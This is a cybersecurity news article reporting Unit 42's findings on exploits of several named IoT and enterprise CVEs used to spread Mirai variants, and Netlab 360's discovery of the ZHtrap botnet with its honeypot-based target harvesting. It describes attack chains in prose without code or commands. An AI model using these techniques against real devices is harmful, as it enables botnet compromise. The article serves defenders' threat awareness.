Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy Mirai variants on compromised systems.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks’ Unit 42 Threat Intelligence Team said in a write-up.
The rash of vulnerabilities being exploited include:
- VisualDoor — a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
- CVE-2020-25506 – a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
- CVE-2021-27561 and CVE-2021-27562 – Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
- CVE-2021-22502 – an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
- CVE-2019-19356 – a Netis WF2419 wireless router RCE exploit, and
- CVE-2020-26919 – a Netgear ProSAFE Plus RCE vulnerability
Also included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with MooBot.
The attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.
Regardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that’s then used to fetch Mirai binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.
Besides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.
“The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,” the researcher said.
New ZHtrap Botnet Traps Victims Using a Honeypot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as Matryosh.
While honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.
It achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload –
“ZHtrap’s propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,” the researchers said. “Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.”
Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.
Noting that the attacks began from February 28, 2021, the researchers said ZHtrap’s ability to turn infected devices into honeypots marks an “interesting” evolution of botnets to facilitate finding more targets.
“Many botnets implement worm-like scan propagation, and when ZHtrap’s honeypot port is accessed, its source is most likely a device that has been infected by another botnet,” the researchers speculated about the malware’s authors. “This device can be infected, there must be flaws, I can use my scanning mechanism to scan again.This could be a good chance that I can implant my bot samples, and then with the process control function, I can have total control, isn’t that awesome?”